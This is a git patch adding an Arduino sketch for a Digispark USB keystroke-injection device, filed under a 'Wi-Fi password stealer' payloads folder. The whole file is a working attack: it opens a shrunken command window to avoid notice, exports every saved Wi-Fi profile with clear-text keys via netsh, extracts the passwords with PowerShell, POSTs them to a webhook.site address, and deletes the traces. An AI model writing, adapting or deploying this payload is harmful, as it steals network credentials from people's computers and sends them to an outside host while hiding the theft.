From 29a68ed6ba7d778bbb577f5887bf4ca395221664 Mon Sep 17 00:00:00 2001 From: Muhammad Talha Khan Date: Sat, 22 Dec 2018 01:41:52 +0500 Subject: [PATCH] Create Wifikey-Grab.ino --- .../Wi-Fi password stealer/Wifikey-Grab.ino | 37 +++++++++++++++++++ 1 file changed, 37 insertions(+) create mode 100644 payloads/Wi-Fi password stealer/Wifikey-Grab.ino diff --git a/payloads/Wi-Fi password stealer/Wifikey-Grab.ino b/payloads/Wi-Fi password stealer/Wifikey-Grab.ino new file mode 100644 index 0000000..567f724 --- /dev/null +++ b/payloads/Wi-Fi password stealer/Wifikey-Grab.ino @@ -0,0 +1,37 @@ +/* + Following payload will grab saved Wifi password and will send them to your hosted webhook. +*/ + +#include "DigiKeyboard.h" + +void setup() { + pinMode(1, OUTPUT); //LED on Model A +} + +void loop() { + + DigiKeyboard.update(); + DigiKeyboard.sendKeyStroke(0); + DigiKeyboard.delay(3000); + DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT); //start run + DigiKeyboard.delay(100); + DigiKeyboard.println("cmd /k mode con: cols=15 lines=1"); //smallest cmd window possible for trying to making it as less noticeable as possible + DigiKeyboard.delay(500); + DigiKeyboard.println("cd %temp%"); //Jumping to temporary dir + DigiKeyboard.delay(300); + DigiKeyboard.println("netsh wlan export profile key=clear"); //grabbing all the saved wifi passwd and saving them in temporary dir + DigiKeyboard.delay(500); + DigiKeyboard.println("powershell Select-String -Path Wi-Fi-* -Pattern 'keyMaterial' > Wi-Fi-PASS"); //Extracting all password and saving them in Wi-Fi-Pass file in temporary dir + DigiKeyboard.delay(500); + DigiKeyboard.println("powershell Invoke-WebRequest -Uri https://webhook.site/ -Method POST -InFile Wi-Fi-PASS"); //Submitting all passwords on hook + DigiKeyboard.delay(1000); + DigiKeyboard.println("del Wi-Fi-* /s /f /q"); //cleaning up all the mess + DigiKeyboard.delay(500); + DigiKeyboard.println("exit"); + DigiKeyboard.delay(100); + digitalWrite(1, HIGH); //turn on led when program finishes + DigiKeyboard.delay(90000); + digitalWrite(1, LOW); + DigiKeyboard.delay(5000); + +}